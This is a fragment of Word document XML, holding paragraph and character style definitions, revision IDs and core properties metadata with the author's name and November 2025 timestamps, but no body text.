    <w:rsid w:val="00BE7BE3"/>
    <w:rsid w:val="00CE4363"/>
    <w:rsid w:val="00D917BC"/>
    <w:rsid w:val="00EE11A0"/>
    <w:rsid w:val="00EF1DC3"/>
    <w:rsid w:val="00F13D01"/>
    <w:rsid w:val="00FC5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C43C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{1E3B9FF5-0A73-4A0D-9D6B-A282069DD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04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04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C9B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00A0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C9B"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00A04C9B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A04C9B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00A04C9B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00A04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C9B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00A04C9B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00FC5B4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E7BE3"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="440"/>
        <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
      </w:tabs>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE11A0"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE11A0"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00EE11A0"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="004E318F"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E318F"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="004E31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582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45D5B-4471-4D1A-AAC0-7FCEB7851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Pages>
  <Words>2094</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Yanamandra</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Richa Yanamandra</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <cp:lastPrinted>2025-11-20T21:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T19:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T21:18:00Z</dcterms:modified>
</cp:coreProperties>
</file>